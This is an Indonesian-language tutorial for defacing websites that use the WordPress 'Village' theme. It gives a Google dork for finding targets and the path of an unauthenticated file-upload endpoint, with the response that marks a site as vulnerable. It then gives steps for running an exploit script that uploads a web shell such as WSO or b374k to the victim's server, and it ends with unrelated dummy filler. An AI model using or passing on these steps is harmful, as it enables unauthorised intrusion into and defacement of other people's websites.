Deface dengan Wordpress Village Themes
Bahan Bahan:
▐ Dork: inurl:/wp-content/themes/village/ use your brain
▐ Xampp
▐ Shell
▐ Exploit
Download dulu xampp nya kang, kalo udah instal langsung, copykan Exploitnya ke Notepad save dengan ekstensi ".php" Contoh: village.php .save di Folder "C:\xampp\php" shell nya jangan lupa di taro di Folder "C:\xampp\php" juga , jadi Shell sama Exploitnya ada di Folder php.
Cuss dehh cari target :v pake dork di atas kalo udah ketemu masukan exploit ini di akhir Url nya:
/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php jadi http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php
kalo Vuln ada tulisan {"error":"No files were uploaded."}.
Buka Exploit php tadi di ...http://localhost/wp-content/... localhost nya di ganti dengan target ente, nah di bagian atas ada kode $uploadfile="wso.php"; wso.php itu nama Shell ane, kalo ente make shell b374k 1n7ection andela or yang laen yaa di ganti misalkan $uploadfile="1n7ection.php"; kalo udah save lagi
Buka Cmd ketikkan: "cd C:\xampp\php" enter kallo udah ketikkan lagi "php namaexploit.php" [Tanpa Tanda kutip] lalu enter kalo berhasil responnya {"success":true}
http://localhost/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/namashell.php
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.